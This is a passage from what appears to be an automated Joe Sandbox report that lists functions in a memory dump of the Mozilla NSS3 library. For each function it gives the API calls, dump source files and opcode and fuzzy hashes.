                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D136A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D137E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1340: PL_ArenaGrow.NSS3(?,6C46F599,?,00000000,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?), ref: 6C4D13CF
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1340: PR_Unlock.NSS3(?,?,6C47895A,00000000,?,00000000,?,00000000,?,00000000,?,6C46F599,?,00000000), ref: 6C4D145C
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,00000008,6C4DA71A,6C4DA71A,00000000), ref: 6C4DA009
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,6C4DA71A,6C4DA71A,00000000), ref: 6C4DA045
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Arena$Util$CriticalEnterSectionUnlockValue$Alloc_ErrorGrowGrow_Mark_
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3535121653-0
                                                                                                                                                                                                                                                      • Opcode ID: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
                                                                                                                                                                                                                                                      • Instruction ID: 8425838ad69e089eda853244e045d771052dcc8f8327902db9dde1aba6c1a556
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d1ae70d6311bc2b933261b9cebe50cfeb7780cc980ad09fb36ff6f910e61e20
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1E2171B56012069BF700EF55DC60F66B7A9BF8536DF118128982987B81EB76F814CBD0
                                                                                                                                                                                                                                                      Function 6C4E2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_ArenaMark_Util.NSS3(?), ref: 6C4E2E08
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: TlsGetValue.KERNEL32 ref: 6C4D14E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: EnterCriticalSection.KERNEL32 ref: 6C4D14F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D14C0: PR_Unlock.NSS3 ref: 6C4D150D
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000400), ref: 6C4E2E1C
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C4E2E3B
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C4E2E95
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C4788A4,00000000,00000000), ref: 6C4D1228
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C4D1238
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C4788A4,00000000,00000000), ref: 6C4D124B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0,00000000,00000000,00000000,?,6C4788A4,00000000,00000000), ref: 6C4D125D
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C4D126F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C4D1280
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C4D128E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C4D129A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C4D12A1
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1441289343-0
                                                                                                                                                                                                                                                      • Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                                                                                      • Instruction ID: db37b749ccf335026cdda39b06fe42a99d5733a928bc73a4707bcf05351ba9d1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 422129B1D003564BE720DF589D44FAA3764AF9531EF170369DD085B742FBB1E58882D2
                                                                                                                                                                                                                                                      Function 6C4B1870 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4B18A6
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,6C496C34,?,?,00000001,00000000,00000007,?), ref: 6C4B18B6
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C496C34,?,?), ref: 6C4B18E1
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4B18F9
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 284873373-0
                                                                                                                                                                                                                                                      • Opcode ID: f987da2f63de5998e3127dcb2e470f421c8a3891a9d7696b8bf906405fc382e8
                                                                                                                                                                                                                                                      • Instruction ID: 1b7ec62d1ca0d751c32356fe7e194ce269c52e05a632b13e545b1c02817d04ef
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f987da2f63de5998e3127dcb2e470f421c8a3891a9d7696b8bf906405fc382e8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E21D075E002199BEB00AF68DC45EEA7B74FF0A318F450168ED156B701E735AA28CBE0
                                                                                                                                                                                                                                                      Function 6C49ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • CERT_NewCertList.NSS3 ref: 6C49ACC2
                                                                                                                                                                                                                                                        • Part of subcall function 6C472F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C472F0A
                                                                                                                                                                                                                                                        • Part of subcall function 6C472F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C472F1D
                                                                                                                                                                                                                                                        • Part of subcall function 6C472AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C470A1B,00000000), ref: 6C472AF0
                                                                                                                                                                                                                                                        • Part of subcall function 6C472AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C472B11
                                                                                                                                                                                                                                                      • CERT_DestroyCertList.NSS3(00000000), ref: 6C49AD5E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C47B41E,00000000,00000000,?,00000000,?,6C47B41E,00000000,00000000,00000001,?), ref: 6C4B57E0
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C4B5843
                                                                                                                                                                                                                                                      • CERT_DestroyCertList.NSS3(?), ref: 6C49AD36
                                                                                                                                                                                                                                                        • Part of subcall function 6C472F50: CERT_DestroyCertificate.NSS3(?), ref: 6C472F65
                                                                                                                                                                                                                                                        • Part of subcall function 6C472F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C472F83
                                                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C49AD4F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 132756963-0
                                                                                                                                                                                                                                                      • Opcode ID: 0457ce4e57142a9ef1761bbb5582145521990fc87b97518428d1cd43c54ec76a
                                                                                                                                                                                                                                                      • Instruction ID: 216b9bdbf2bd8b829428258310e61daee8ca15baa1920273d374bd8b2e8f88e4
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0457ce4e57142a9ef1761bbb5582145521990fc87b97518428d1cd43c54ec76a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E521C3B1D002248BEB20DF64D805DEEBBB4EF05209F064168D8057B711FB31AA49CBE5
                                                                                                                                                                                                                                                      Function 6C4C3C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4C3C9E
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4C3CAE
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4C3CEA
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4C3D02
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalEnterErrorSectionUnlockValue
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 284873373-0
                                                                                                                                                                                                                                                      • Opcode ID: ea2cab9b82ba03b39a8fe8d42fbaab79ebc8ed2b99ad52fc8082de9a7b961d6d
                                                                                                                                                                                                                                                      • Instruction ID: 713f123f296bef2ac9a171d58b6da8e77c609a7faadb66fff2e3bf512eb84974
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ea2cab9b82ba03b39a8fe8d42fbaab79ebc8ed2b99ad52fc8082de9a7b961d6d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1119D7AA00214AFEB00EF24DC48E9A3778EF09369F554164EC088B722E731ED448AE1
                                                                                                                                                                                                                                                      Function 6C4CECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6C4CF0AD,6C4CF150,?,6C4CF150,?,?,?), ref: 6C4CECBA
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6C4CECD1
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C4CED02
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D116E
                                                                                                                                                                                                                                                      • PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C4CED5A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2957673229-0
                                                                                                                                                                                                                                                      • Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                                                      • Instruction ID: ba24e346a56770f5158f28d17e0e854b17caa69535ec9ecc7cfb7bf940d60bd1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C72101B5A017829BE300CF21D984F52B7E4BFA4309F26C21AE80C87B61EB70E594C6D1
                                                                                                                                                                                                                                                      Function 6C49C860 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PK11_IsLoggedIn.NSS3(?,?), ref: 6C49C890
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FAF
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FD1
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FFA
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C499013
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C499042
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C49905A
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C499073
                                                                                                                                                                                                                                                        • Part of subcall function 6C498F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C499111
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C49C8B2
                                                                                                                                                                                                                                                        • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
                                                                                                                                                                                                                                                      • PK11_Authenticate.NSS3(?,00000001,?), ref: 6C49C8D0
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C49C8EB
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: K11_Value$CriticalEnterSectionUnlock$AuthenticateCurrentInternalItem_LoggedSlotThreadUtilZfree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 999015661-0
                                                                                                                                                                                                                                                      • Opcode ID: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
                                                                                                                                                                                                                                                      • Instruction ID: 6901fecdbc2a90a81d6296ed7e4307ec161ff570f75dcd4b778f876e9e063529
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 477a7ae121ca17423d818f87d30b67f1952193dc40be73abf14df5b980759708
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0D01C666E111306BD700E5B96C80EAF3F699B4526EF040139FC08A6B01F751881982E2
                                                                                                                                                                                                                                                      Function 6C4FEDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C4E7FFA,?,6C4E9767,?,8B7874C0,0000A48E), ref: 6C4FEDD4
                                                                                                                                                                                                                                                      • realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C4E7FFA,?,6C4E9767,?,8B7874C0,0000A48E), ref: 6C4FEDFD
                                                                                                                                                                                                                                                      • PORT_Alloc_Util.NSS3(?,00000000,00000000,6C4E7FFA,?,6C4E9767,?,8B7874C0,0000A48E), ref: 6C4FEE14
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: malloc.MOZGLUE(6C4C8D2D,?,00000000,?), ref: 6C4D0BF8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,6C4E9767,00000000,00000000,6C4E7FFA,?,6C4E9767,?,8B7874C0,0000A48E), ref: 6C4FEE33
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3903481028-0
                                                                                                                                                                                                                                                      • Opcode ID: 08490fb3241a13323802f16128c83edaddad641becc7d6c8acb52c09b3278623
                                                                                                                                                                                                                                                      • Instruction ID: d9da81c9dd2e83b0aee59866507e02eea407bfdb42520088129742e7d2e64fef
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08490fb3241a13323802f16128c83edaddad641becc7d6c8acb52c09b3278623
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF11A3B1A04706ABEB10DE65ECC4F46B3A8EB8035EF204535E92987F01E331F46687E1
                                                                                                                                                                                                                                                      Function 6C47DFA0 Relevance: 6.1, APIs: 4, Instructions: 62COMMON
                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C4906A0: TlsGetValue.KERNEL32 ref: 6C4906C2
                                                                                                                                                                                                                                                        • Part of subcall function 6C4906A0: EnterCriticalSection.KERNEL32(?), ref: 6C4906D6
